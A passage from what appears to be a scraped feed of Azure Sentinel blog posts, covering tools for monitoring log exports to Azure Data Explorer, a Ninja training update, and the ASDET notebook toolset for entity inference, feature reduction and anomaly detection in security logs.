generated, helping to optimize the Security Analysts triage process. You can customize this approach for your environment and extend this idea for your other uses.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_10-1629747493903.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305196i288142B2DC08BBCA/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_10-1629747493903.png" alt="Rin_Ure_10-1629747493903.png" /></span>&nbsp;<STRONG>Video 8 Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/c3VnQPYEIDY</A>&nbsp;</P> <P>&nbsp;</P> <P>I look forward to reading your comments and hearing your feedback regarding this comprehensive video series.</P> <P>&nbsp;</P> <P><U><STRONG>Reviewers:</STRONG></U></P> <UL> <LI><STRONG>Rin Ure</STRONG> (Principal Security Lead) <UL> <LI>My YouTube Channel:&nbsp;<A href="#" target="_blank" rel="noopener">https://www.youtube.com/channel/UCQBN4fDXmXZTMib7t14fXwA</A>&nbsp;</LI> </UL> </LI> <LI><STRONG>Mark Simos</STRONG> (Dir Business Strategy)</LI> <LI><STRONG>Richard Diver</STRONG> (Sr Business Strategy Mgr)</LI> <LI><STRONG>Paulette Lee</STRONG> (CSG Mgmt)</LI> </UL> Wed, 08 Sep 2021 10:16:19 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-soc-process-framework-8-part-video/ba-p/2662791 RinUre 2021-09-08T10:16:19Z Check the health of your exported Azure Sentinel logs in your ADX cluster https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/check-the-health-of-your-exported-azure-sentinel-logs-in-your/ba-p/2668363 <P><SPAN>More and more Azure Sentinel customers are opting for long-term retention of their logs in Azure Data Explorer (ADX), either due to compliance regulations, or because they still want to be able to perform investigations on their archived logs in the event of a security incident. </SPAN></P> <P><SPAN>As the Azure Sentinel ingestion price includes 90 days of retention for free, the option of keeping the logs for longer periods in Azure Data Explorer is preferred by many (see </SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/using-azure-data-explorer-for-long-term-retention-of-azure/ba-p/1883947" target="_blank" rel="noopener"><SPAN>Using Azure Data Explorer for long term retention of Azure Sentinel logs - Microsoft Tech Community</SPAN></A><SPAN>).&nbsp;</SPAN></P> <P>&nbsp;</P> <P>Even though the Azure Sentinel + ADX solution requires little to no maintenance, we wanted to provide a solution for our customers to keep an eye on the number of events and overall status of their ADX clusters and databases.&nbsp;<SPAN>For this reason, <STRONG>we have created two tools: the </STRONG></SPAN><STRONG><A href="#" target="_blank" rel="noopener">ADXvsLA workbook</A> and the <A href="#" target="_self">ADX Health Playbook</A></STRONG>. The workbook will allow you to have a look at the number of logs on Azure Sentinel &amp; ADX and the overall health of your ADX cluster. The playbook will send you a warning if an unexpected delay in the ingestion of ADX is detected.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Below, we will describe both in more detail:</P> <P>&nbsp;</P> <H1><FONT size="5">ADXvsLA Workbook</FONT></H1> <P>&nbsp;</P> <P>When you open the workbook, you can select the following parameters:</P> <UL> <LI>the ADX cluster and database</LI> <LI>the Azure Sentinel workspace from which the logs are exported to the aforementioned ADX cluster,</LI> <LI>as well as the time range for which you want to see data</LI> </UL> <P>Use the Show Help toggle to see a detailed explanation of each section.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="img1.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308805i855F1EB489A4F37C/image-size/large?v=v2&amp;px=999" role="button" title="img1.png" alt="img1.png" /></span></P> <P><FONT size="4"><STRONG>Raw Tables</STRONG></FONT></P> <P><FONT size="3">W</FONT>hen you ingest logs from Azure Sentinel to ADX, the logs are first ingested into an intermediate table with raw data. This raw data is updated by a function with an update policy and is saved to its destination table with the correct mapping. Afterwards, the data is deleted, which is why you will typically see that these raw tables are empty. The retention policy should also be set for 0 days.</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="img2.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308806iAA971735575B917F/image-size/large?v=v2&amp;px=999" role="button" title="img2.png" alt="img2.png" /></span></P> <P>&nbsp;</P> <P><FONT size="4"><STRONG>Final ADX Tables</STRONG></FONT></P> <P>In this section, you will see information about the final ADX tables, which have the right schema and can be queried from Azure Sentinel. You will find information regarding the row count, size, retention policy and hot cache size etc.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="img3.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308807iE06443C1182BA91E/image-size/large?v=v2&amp;px=999" role="button" title="img3.png" alt="img3.png" /></span></P> <P>&nbsp;</P> <P>Select one of the table names to generate the comparison section. This is where you can see the differences between the table on ADX and on your Log Analytics workspace. Then, select the time range for which you want to see the comparison.</P> <P>In the table you will find:</P> <UL> <LI>The number of entries in ADX, in Log Analytics, and the difference in number of logs between them.</LI> <LI>How long it has been since the last log was received</LI> <LI>The timestamp of the last logs.</LI> <LI>The number of new logs received in Log Analytics since the last log in ADX was received</LI> </UL> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="img4.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308808i5889FC6565027F69/image-size/large?v=v2&amp;px=999" role="button" title="img4.png" alt="img4.png" /></span></P> <P>&nbsp;</P> <P class="lia-align-justify lia-indent-padding-left-30px">Notice the <STRONG>New in Log Analytics column</STRONG></P> <UL> <LI style="list-style-type: none;"> <UL> <LI>In the screenshot, you can see there are 52 logs in the "New in Log Analytics" column. This means that, at the time we compared the tables, there were 52 entries that had not reached ADX yet. <BR />If this happens, you should compare the timestamp and the difference for the last log that was received. In this case, it is around 15 minutes. Delays of 30 minutes or less are expected, so this means your tables are working as expected.</LI> <LI>It is also possible that you see a negative number in the New in Log Analytics column. This could happen if, due to the lag in ADX, there were Log Analytics logs from the previous period that were received in ADX during the current period. Let's suppose that you ingested 1000 logs in Log Analytics on the previous 24h window, but only 990 reached ADX in that period; and then you ingested 1000 logs again on the current 24h window, and all those logs, plus the 10 logs from the previous day, reached ADX. In this case, you will see that the "New in Log Analytics" column would say -10. In these cases, you only need to look at the LastTM difference. If it is around 30 minutes or less, then it will be fine.</LI> </UL> <P>&nbsp;</P> </LI> </UL> <P>Finally, at the bottom of the workbook you will see metrics regarding events received, events dropped, received data, volume and other metrics.</P> <P>&nbsp;</P> <H1><FONT size="5">ADX Health Playbook</FONT></H1> <P>&nbsp;</P> <P>The ADX Health Playbook compares the number of logs in your Azure Sentinel tables and ADX tables periodically (every 24h by default) and sends you a warning via email if it detects a difference in the number of logs that may require your attention (that is, in the "New in Log Analytics" column mentioned previously). As it takes logs a few minutes to reach ADX after having been ingested into Log Analytics, the query in the playbook by default looks back at the period between the last 25h and last 30min.</P> <P>Please read the accompanying <A href="#" target="_self">readme.md file on GitHub</A> to set it up.</P> <P>&nbsp;</P> <P>We hope you find these tools useful! If you have any suggestions for improving this content or any questions, please leave us a comment.</P> Wed, 08 Sep 2021 09:43:58 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/check-the-health-of-your-exported-azure-sentinel-logs-in-your/ba-p/2668363 NChristis 2021-09-08T09:43:58Z Azure Sentinel Ninja Training - the Sept 2021 update https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-ninja-training-the-sept-2021-update/ba-p/2677688 <P>It's that time of year again... time for another update of the Azure Sentinel Ninja training! (access the training <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/become-an-azure-sentinel-ninja-the-complete-level-400-training/ba-p/1246310" target="_blank" rel="noopener">here</A>)</P> <P>&nbsp;</P> <P>In this post I'll list the new and updated modules with important new features for the ninja training. As per usual with the ninja training updates, there have been many changes to Azure Sentinel in this time and the updates found here should not be considered exhaustive. To keep up to date with all the new features being released in Azure Sentinel, make sure you regularly monitor our <A href="#" target="_blank" rel="noopener">what's new page</A>.</P> <P>&nbsp;</P> <H2>Azure Sentinel Ninja Training Certification</H2> <P>An important update to the training is the release of the Azure Sentinel Ninja Training knowledge check. This has already been announced in a separate blog post but for completeness it has also been included in this update post. You can take the <A href="#" target="_blank" rel="noopener">knowledge check</A> and if you score over 80%, you can fill in the <A href="#" target="_blank" rel="noopener">self-attestation form</A> to receive an Azure Sentinel Ninja Training certification.&nbsp;</P> <P>&nbsp;</P> <P><EM>Note: it can take up to one business day for you to receive your certificate via email.</EM> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</P> <P>&nbsp;</P> <H2 id="toc-hId-1931980402">New and updated modules&nbsp;</H2> <P>New modules that cover new functionality areas in Azure Sentinel:</P> <UL> <LI>Module X: Migration</LI> <LI>Module Y: Notebooks</LI> <LI>Module Z: ASIM and Normalization</LI> </UL> <P>&nbsp;</P> <P><SPAN>Also, several modules have been expanded:</SPAN></P> <UL> <LI><SPAN>Module 3: Workspace and tenant architecture - expanded to cover more MSSP/multi-tenant scenario guidance.</SPAN></LI> <LI><SPAN>Module 4: Data collection - expanded to cover the Azure Monitor Agent (AMA).</SPAN></LI> <LI><SPAN>Module 8: Analytics - expanded to cover SOC-ML anomalies and&nbsp;Fusion ML Detections with Scheduled Analytics Rules.</SPAN></LI> <LI>Module 11: Use cases and solutions - added content about the Solutions gallery.</LI> <LI>Module 12: Handling incidents - covers Teams integration with Sentinel.</LI> <LI>Module 13: Hunting - updated to reflect the new hunting dashboard.&nbsp;</LI> </UL> <P>&nbsp;</P> <H2 id="toc-hId-124525939">New and updated webinars</H2> <UL> <LI>Module 4: Data collection - a new webinar covering data collection scenarios.</LI> <LI>Module 5: Log Management - a new webinar that covers <SPAN>using Azure Data Explorer for long-term retention of Azure Sentinel logs.</SPAN></LI> <LI><SPAN><SPAN>Module 15:&nbsp;</SPAN></SPAN>Monitoring Azure Sentinel's health - a new webinar that covers c<SPAN>ost management in Azure Sentinel.</SPAN></LI> </UL> <H2>&nbsp;</H2> <H2 id="toc-hId-124525939">Azure Sentinel webinars coming soon</H2> <UL> <LI>Learn About Customizable Anomalies and How to Use Them - Sept 14</LI> <LI>Azure Sentinel | What's New in the Last 6 Months - Sept 15</LI> <LI>Turbocharging ASIM: Making Sure Normalization Helps Performance Rather Than Impacting It - Oct 6</LI> <LI>SAP Mini-Series Part 1: Introduction to Monitoring SAP with Azure Sentinel for Security Professionals - Oct 18</LI> <LI>Explore the Power of Threat Intelligence in Azure Sentinel - 25 Oct</LI> <LI>What’s New in Azure Sentinel Automation - Oct 28</LI> <LI>SAP Mini-Series Part 2: Deep Dive - End-to-End Installation of SAP for Azure Sentinel - Nov 9</LI> <LI>Decrease Your SOC’s MTTR (Mean Time to Respond) by Integrating Azure Sentinel with Microsoft Teams - Nov 10</LI> <LI>Create Your Own Azure Sentinel Solutions - Nov 16</LI> <LI>Everything You Ever Wanted to Know About Using the New Azure Monitor Agent (AMA) with Azure Sentinel - Nov 22</LI> </UL> <P>&nbsp;</P> <P><FONT>You can sign up for webinars <A href="#" target="_blank" rel="noopener">here</A>. Please note that the<SPAN>&nbsp;</SPAN><STRONG>registration links</STRONG><SPAN>&nbsp;</SPAN>will be made available approximately two weeks before the webinar. Until then, all dates are tentative.</FONT></P> Wed, 08 Sep 2021 09:07:10 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-ninja-training-the-sept-2021-update/ba-p/2677688 Sarah_Young 2021-09-08T09:07:10Z Introducing: Azure Sentinel Data Exploration Toolset (ASDET) https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-data-exploration-toolset-asdet/ba-p/2712728 <P><FONT size="6">Introducing: Azure Sentinel Data Exploration Toolset (ASDET)</FONT></P> <P>&nbsp;</P> <H1><FONT size="5">What’s ASDET and why should you use it?</FONT></H1> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; Security Analysts deal with extremely large datasets in Azure Sentinel, making it challenging to efficiently analyze them for anomalous data points. We sought to streamline the data analysis process by developing a notebook based toolset to reduce the data to a&nbsp;more manageable&nbsp;format, effectively allowing analysts to easily and efficiently gain a better understanding of their dataset and detect anomalies therein. Our toolset has three main components that each provide a different way of turning raw data into useful insights: data inference, feature engineering, and anomaly detection.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; This project is a set of Python modules intended for use Jupyter notebooks. These, along with sample notebooks are open source and available on GitHub for use by the community. If you would like to follow along with the example Notebooks, as well as to learn more about ASDET, you can do this at the <A href="#" target="_blank" rel="noopener">GitHub repo</A>.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="znguyen_0-1630697734559.png" style="width: 647px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308011i7A0D7FD3441353F2/image-size/large?v=v2&amp;px=999" role="button" title="znguyen_0-1630697734559.png" alt="znguyen_0-1630697734559.png" /></span></P> <P>&nbsp;</P> <H1><FONT size="5">Data Inference</FONT></H1> <H2>&nbsp;</H2> <H2><FONT size="4">Entity Identification</FONT></H2> <P>You can find the notebook for this section in the identification folder in the <A href="#" target="_self">GitHub repo</A>.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; What are entities in the context of Azure Sentinel? An Azure Sentinel workspace contains many tables, which contain different types of data that we classify into categories called entities. For example, the data of a particular column in a particular table might be an instance of an entity like IP address. <A href="#" target="_blank" rel="noopener">Other common entities</A>&nbsp;include account, host, file, process, and URL. It’s useful for Security Analysts to know what entities are in their dataset because they can then pivot on a suspicious data point or find anomalous events.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The goal of this section is to automatically infer entities in the dataset. We want to do this because entities are key elements for analysts to use in investigations and can be effectively used to join different datasets where common entities occur. We detect entities using regular expressions for the entities and applying these to each column in a table. Since most entities have unique identifiers with patterns specific to that entity, using regular expressions usually leads to accurate results. When more than one regular expression matches for a column, we resolve this conflict by first comparing the match percentages and choosing the entity for the regular expression with the highest match percentage. If the match percentages are the same, we use a priority system which assigns a priority level to each entity based on the specificity of the regular expression. For example, an Azure Resource Identifier looks like a Linux or URL path and so also matches the regex for a <EM>file</EM>, so the Azure Resource ID regex has a higher priority than the <EM>file</EM> regex.</P> <P>&nbsp;</P> <P>Note: some entity identifiers such as GUIDs/UUIDs are not generally detectable as entities since patterns like this are not specific to any single entity.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; If an analyst wanted to know the entities in the table OfficeActivity (which contains events related to Office 365 usage), they would simply import the Entity Identification module, select the table from a dropdown list, and run the detection function on it. Then they would be able to see what the entities found in a table and what columns they correspond to.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture1.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308037i252F82EADAD02F2E/image-size/large?v=v2&amp;px=999" role="button" title="Picture1.gif" alt="Picture1.gif" /></span></P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; In addition, analysts may find visualizations of entity-table relationships helpful, particularly when identifying elements such as common entities between tables.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="znguyen_2-1630697821389.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308013iEC9833F535F5C3A6/image-size/medium?v=v2&amp;px=400" role="button" title="znguyen_2-1630697821389.png" alt="Distribution of entities in dataset" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Distribution of entities in dataset</span></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="znguyen_3-1630697821399.png" style="width: 672px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308012i2A7AA061240A410B/image-size/large?v=v2&amp;px=999" role="button" title="znguyen_3-1630697821399.png" alt="Relationships between tables (red), entities (blue), and columns (orange)" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Relationships between tables (red), entities (blue), and columns (orange)</span></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="znguyen_4-1630697821417.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308017i6D0DAEC04C1FED2B/image-size/large?v=v2&amp;px=999" role="button" title="znguyen_4-1630697821417.png" alt="Flow from entity to table" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Flow from entity to table</span></span></P> <H2><FONT size="4">Autogenerated KQL Queries</FONT></H2> <P data-unlink="true">&nbsp; &nbsp; &nbsp; Using the results of the previous section, our toolset also allows users to autogenerate KQL queries to investigate a specific instance of an entity. For example, if the analyst wanted to know where the user mbowen@contoso.com&nbsp; appears in the dataset, they would pass the email address as well as its entity type, which is account, into the query function. A list of KQL queries is returned which can be run to find where the mbowen@contoso.com&nbsp; email is found.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="9ELNb8iWXv.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308036i3816A3F804385A28/image-size/large?v=v2&amp;px=999" role="button" title="9ELNb8iWXv.gif" alt="9ELNb8iWXv.gif" /></span></P> <H1><FONT size="5">Feature Engineering</FONT></H1> <P>You can find the notebook for this section in the feature engineering folder in the <A href="#" target="_self">GitHub repo</A>.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; What is feature engineering? When dealing with large datasets, it is often impossible to develop models that use the entirety of the features (columns within the dataset) available to us in the feature space. We use feature engineering to pick and choose the most important features.&nbsp; However, when dealing with unknown data, it is often time consuming to pick and choose the most important features, so we developed a programmatic way to reduce the dimensionality of a dataset by picking features that are relevant to us.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; Our toolset is composed of two broad areas: the data cleaning toolkit and the data signature toolkit.&nbsp; The data cleaning toolkit is composed of several functions that were able to reduce features (columns) in datasets by approximately 50%</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; To clean the table automatically, we can simply import our module and call our function on our Pandas DataFrame.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="python">from utils import cleanTable result = cleanTable(df)</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>The cleanTable module contains functions for the following tasks:</P> <UL> <LI><A href="#" target="_self">Dimensionality reduction using entropy-based thresholds</A></LI> <LI><A href="#" target="_self">Invariant column removal</A></LI> <LI><A href="#" target="_self">Duplicate column removal</A></LI> <LI><A href="#" target="_self">Table Binarization Mapping</A>&nbsp;</LI> <LI><A href="#" target="_self">Regular expression-based pruning</A></LI> </UL> <P>&nbsp; &nbsp; &nbsp; The table below shows the result of running feature engineering on our sample dataset “Office Activity”.&nbsp; It managed to reduce the number of columns from 131 columns to the 46 most important columns.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="before_after.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308035i57038AEC9536B1F0/image-size/large?v=v2&amp;px=999" role="button" title="before_after.png" alt="Top: Original table. Bottom: Cleaned table" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Top: Original table. Bottom: Cleaned table</span></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The data signature toolkit builds on the Binarization Mapping function mentioned previously. It works by assigning a “signature” to each unique row of data based on whether columns are populated with data or not. In the binary signature 1’s represent a present value in that column and a 0 represents an absent value in that column. For example, 1100 would indicate that the first two columns are filled in and the last two columns are not.&nbsp; We can use data signatures to learn more about the following:</P> <UL> <LI>Underlying feature distributions under the signature</LI> <LI>Anomalous data signatures based on frequency and value</LI> <LI>Optimal pivot columns</LI> <LI>Unique values that can be used to identify certain data signatures</LI> </UL> <P>&nbsp; &nbsp; &nbsp; To call the data signature, we import the module and call the <EM>findUniques</EM> function on our Pandas Dataframe.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="python">from signature import DataSignature data = DataSignature(df) data.generateSignatures() data.findUniques() </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>The animated GIF below shows us an example of how the data signature notebook works.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="signatureGeneratoin.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308034iC29465111057DBEC/image-size/large?v=v2&amp;px=999" role="button" title="signatureGeneratoin.gif" alt="Data signature example notebook" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Data signature example notebook</span></span></P> <H1><FONT size="5">Anomaly Detection</FONT></H1> <P>&nbsp; &nbsp; &nbsp; Anomalies can be defined as any data point that does not follow a normal behavior. It can be very effective in security analysis by helping focus analysts on key events which would otherwise be very difficult to find in large datasets.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; ASDET Anomaly Detection gives security analysts the option to explore data and identify anomalies through user selected entities (obtained using the data inference described earlier) and other features (data columns) whilst reducing the need to code and model. We have implemented two anomaly modeling methods – Isolation Forests and Time Series Analysis.</P> <H2><FONT size="4">Isolation Forests</FONT></H2> <P>&nbsp; &nbsp; &nbsp; You can find the notebook for this section in the isolation forest folder in the <A href="#" target="_self">GitHub repo</A>.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; A security analyst can identify anomalies in any Azure Log Analytics table through the Isolation Forests ML model. They can do this by selecting a table, an entity, and other features (columns), and the time range. The entities can be easily derived by using the Entity Identification feature of ASDET that we covered earlier in the blog, &nbsp;and &nbsp;are presented to the user in the form of a drop-down menu . After selecting entities and features, the data is cleaned and the machine learning model – Isolation Forests – is used to identify the anomalies using an anomaly score which is generated for each datapoint, classifying how anomalous it is. The<SPAN> For example an anomaly score such as 0.7 indicates high anomaly whereas 0.1 indicates low anomaly.&nbsp;</SPAN></P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; You can learn more about the Isolation Forest algorithm here - <A href="#" target="_blank" rel="noopener">Isolation forest - Wikipedia</A></P> <P>The importance of these anomalies and anomaly score is that they help security analysts identify users that exhibit unusual activity (which could be suspicious activity) that otherwise would be challenging to spot within a large dataset. Security Analysts can then further explore this flagged data through various visualization methods and single out any areas they determine to be malicious.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; In this animation below - The user is selecting their entities, features and their time range. After which, a subset of the selected Azure Sentinel table is created, based on the user selections, and the data is modeled on to obtain any anomalous users.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="User_selection.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308044iAB3715A8E8BCB89E/image-size/large?v=v2&amp;px=999" role="button" title="User_selection.gif" alt="User_selection.gif" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; After modeling, the users are marked as anomalous or not. A flag <EM>’1’</EM> indicates <EM>anomalous users </EM>and <EM>a flag ‘0’ </EM>indicates <EM>non-anomalous</EM> <EM>users</EM>. &nbsp;Here, nine datapoints are marked anomalous because of high number of Login Times, Operation, and other user selected columns.&nbsp; Outputs are available in numerous formats such as an Excel, DataFrame with a data as itself and count of distinct occurrences. This is shown in the following animation.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Modeling2.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308046i6DB5CFE9425ACB90/image-size/large?v=v2&amp;px=999" role="button" title="Modeling2.gif" alt="Modeling2.gif" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The following image shows a histogram of the obtained Anomaly Scores for each user with a right tail end and adjustable bin sizes. This visualization helps identify how the distribution of the anomaly scores look throughout the modeled data.</P> <P>&nbsp;</P> <P>&nbsp;<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="anomaly_score.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308049iA4351C5E0D917A36/image-size/large?v=v2&amp;px=999" role="button" title="anomaly_score.png" alt="X – axis = Anomaly Score, Y-axis = Number of total occurrences" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">X – axis = Anomaly Score, Y-axis = Number of total occurrences</span></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The following image shows a line graph for the total number of logins for each user. &nbsp;The highest points signify anomalies and are further visualized in another line graph. This visualization helps identify how the distribution of the number of logins per user look throughout the modeled data.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="total_logins.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308050i1C0F203C204F556A/image-size/large?v=v2&amp;px=999" role="button" title="total_logins.png" alt="X – axis = User, Y-axis = Number of total logins" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">X – axis = User, Y-axis = Number of total logins</span></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The following animation shows a series of bar graphs for each anomalous user visualizing the distribution of their total logins over time. This visualization shows how often a user has logged in and if their logins are consistent or unanticipated (suspicious)</P> <P>X – axis = Dates (YYYY-MM-DD), Y-axis = Number of total logins</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="time_series.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308054iEF0AE17AE0C1BE43/image-size/large?v=v2&amp;px=999" role="button" title="time_series.gif" alt="time_series.gif" /></span></P> <P>&nbsp;</P> <H2><FONT size="4">Multivariate Timeseries</FONT></H2> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; You can find the sample notebook for this section in the anomaly folder in the <A href="#" target="_self">GitHub repo</A>.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; What are time series? Time series are a way for us to measure one or more variables with respect to time.&nbsp; This is useful when dealing with security log data because all of the features (columns) in security logs have an associated time stamp.&nbsp; In our case, we are modelling the distinct values within a feature per hour (e.g., number of distinct client IP addresses) using the <A href="#" target="_self">MSTICPy Time Series decomposition functions</A>.&nbsp; By generating a set of time series models for a set of features, we can identify common trends during certain time periods for all selected features at once.&nbsp; This allows analysts to more quickly analyze multiple features at once within a time series.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; *Please note that this method is not truly multivariate timeseries analysis, but rather we independently generate the time series for each individual feature and form a composite image representing the dataset. It also allows users to discern if a timeframe is anomalous within a single feature or multiple features.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The user first selects a table to analyze. From there, they can select a subset of features as well as a timeframe they want to analyze.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="timeSeriesSelection.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308033iB3DA736D948C19D2/image-size/large?v=v2&amp;px=999" role="button" title="timeSeriesSelection.gif" alt="Selecting a subset of features and a timeframe" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Selecting a subset of features and a timeframe</span></span></P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The user can then query the data automatically for that time frame, model the time series, and map anomalies to the time stamps.&nbsp; The result is a table displaying the timestamps at which anomalies occur.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="anomalyTable.PNG" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308032i9EC04EE418B27F26/image-size/large?v=v2&amp;px=999" role="button" title="anomalyTable.PNG" alt="Table containing anomalous features at a given timestamp" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Table containing anomalous features at a given timestamp</span></span></P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; The user can then choose a time range to view, and a graph displaying the unique values within an hourly time frame will displayed with the anomalies marked in red.</P> <H2><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="visualizeTimeSeries.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308031iC1DD6CD06142F18D/image-size/large?v=v2&amp;px=999" role="button" title="visualizeTimeSeries.gif" alt="Visualizing anomalies" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Visualizing anomalies</span></span><SPAN style="color: inherit; font-family: inherit;">&nbsp; &nbsp; &nbsp;</SPAN></H2> <H2><FONT size="5">Summary:</FONT></H2> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; ASDET provides a security analyst a complete set of tools to explore any security log dataset programmatically instead of manually. While the examples here show their use with Azure Sentinel and &nbsp;Azure Log Analytics data, the tools can be used with log data from most other sources.</P> <P>&nbsp; &nbsp; &nbsp; Exploring data programmatically saves an analyst’s time and means they can investigate new datasets quickly and effectively. Moreover, ASDET’s capabilities such as Data Inference, Feature Engineering and Anomaly Detection are not just restricted to Azure but with slight modification can be functional to any general dataset. To find out more details and to see the code, check the ASDET GitHub out at <A href="#" target="_blank" rel="noopener">microsoft/ASDET (github.com)</A></P> <P>&nbsp;</P> Fri, 03 Sep 2021 23:48:32 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-data-exploration-toolset-asdet/ba-p/2712728 znguyen 2021-09-03T23:48:32Z Alert enrichment "how to reduce incident triage and investigation times using dynamic alert details” 